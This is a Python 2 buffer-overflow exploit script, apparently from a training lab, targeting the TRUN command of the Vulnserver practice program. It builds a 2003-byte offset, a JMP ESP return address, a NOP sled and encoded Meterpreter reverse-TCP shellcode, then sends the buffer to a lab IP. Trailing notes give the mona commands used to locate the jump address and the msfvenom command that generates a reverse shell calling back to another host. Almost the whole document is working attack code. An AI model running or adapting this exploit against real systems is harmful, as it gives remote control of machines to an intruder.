  1 #!/usr/bin/python2.7
  2 
  3 import socket
  4 
  5 '''
  6 625011AF
  7 625011BB
  8 '''
  9 
 10 buf = "TRUN /.:/"         #Exploit
 11 buf += "A" * 2003         #Buffer Offset
 12 buf += "\xAF\x11\x50\x62" #JMP ESP
 13 buf += "\x90" * 15
 14 buf += b"\xd9\xe5\xd9\x74\x24\xf4\xba\x83\xba\xce\xc9\x5e"
 15 buf += b"\x29\xc9\xb1\x59\x31\x56\x19\x83\xee\xfc\x03\x56"
 16 buf += b"\x15\x61\x4f\x32\x21\xea\xb0\xcb\xb2\x94\x39\x2e"
 17 buf += b"\x83\x86\x5e\x3a\xb6\x16\x14\x6e\x3b\xdd\x78\x9b"
 18 buf += b"\xc8\x93\x54\xac\x79\x19\x83\x83\x7a\xac\x0b\x4f"
 19 buf += b"\xb8\xaf\xf7\x92\xed\x0f\xc9\x5c\xe0\x4e\x0e\x2b"
 20 buf += b"\x8e\xbf\xc2\x27\x22\x2f\x68\x75\xff\x18\x6f\xaa"
 21 buf += b"\x74\xe6\x17\xcf\x4b\x92\xab\xce\x9b\xd1\x7c\xc9"
 22 buf += b"\x90\xbd\x5c\xb9\xa7\xee\x18\xf0\xdc\x2c\x6a\x32"
 23 buf += b"\xe2\xc7\x58\xbf\x1d\x01\x91\x7f\xdc\x62\xdf\xd3"
 24 buf += b"\xde\xbb\xd8\xcb\x94\xb7\x1a\x71\xaf\x0c\x60\xad"
 25 buf += b"\x3a\x92\xc2\x26\x9c\x76\xf2\xeb\x7b\xfd\xf8\x40"
 26 buf += b"\x0f\x59\x1d\x56\xdc\xd2\x19\xd3\xe3\x34\xa8\xa7"
 27 buf += b"\xc7\x90\xf0\x7c\x69\x81\x5c\xd2\x96\xd1\x39\x8b"
 28 buf += b"\x32\x9a\xa8\xda\x43\x63\x33\xe3\x19\xf3\xff\x2e"
 29 buf += b"\xa2\x03\x68\x38\xd1\x31\x37\x92\x7d\x79\xb0\x3c"
 30 buf += b"\x79\x08\xd6\xbe\x55\xb2\xb7\x40\x56\xc2\x9e\x86"
 31 buf += b"\x02\x92\x88\x2f\x2b\x79\x49\xcf\xfe\x17\x43\x47"
 32 buf += b"\x0b\xd5\x4c\x6b\x63\x1b\x73\x87\x6a\x92\x95\xf7"
 33 buf += b"\xc2\xf4\x09\xb8\xb2\xb4\xf9\x50\xd9\x3b\x25\x40"
 34 buf += b"\xe2\x96\x4e\xeb\x0d\x4e\x26\x84\xb4\xcb\xbc\x35"
 35 buf += b"\x38\xc6\xb8\x76\xb2\xe2\x3d\x38\x33\x87\x2d\x2d"
 36 buf += b"\x24\x67\xae\xae\xc1\x67\xc4\xaa\x43\x30\x70\xb1"
 37 buf += b"\xb2\x76\xdf\x4a\x91\x05\x18\xb4\x64\x3f\x52\x83"
 38 buf += b"\xf2\x7f\x0c\xec\x12\x7f\xcc\xba\x78\x7f\xa4\x1a"
 39 buf += b"\xd9\x2c\xd1\x64\xf4\x41\x4a\xf1\xf7\x33\x3e\x52"
 40 buf += b"\x90\xb9\x19\x94\x3f\x42\x4c\xa6\x38\xbc\x12\x81"
 41 buf += b"\xe0\xd4\xec\x91\x10\x24\x87\x11\x41\x4c\x5c\x3d"
 42 buf += b"\x6e\xbc\x9d\x94\x27\xd4\x14\x79\x85\x45\x28\x50"
 43 buf += b"\x4b\xdb\x29\x57\x50\xec\x50\x18\x67\x0d\xa5\x30"
 44 buf += b"\x0c\x0e\xa5\x3c\x32\x33\x73\x05\x40\x72\x47\x32"
 45 buf += b"\x5b\xc1\xea\x13\xf6\x29\xb8\x64\xd3"
 46 
 47 s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) #Creates ipv4 Socket
 48 s.connect(("10.50.42.7", 9999))   #IP and port to connect to
 49 print s.recv(1024)                #print response
 50 s.send(buf)                       #send the variable buf
 51 print s.recv(1024)                #print response
 52 s.close()


!mona modules gave me .dll 
!mona jmp -r esp -m "essfunc.dll"

student@lin-ops:~/Windows_Demo$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.31.252 LPORT=5150 -b"x\00' -f python ----> PAYLOAD

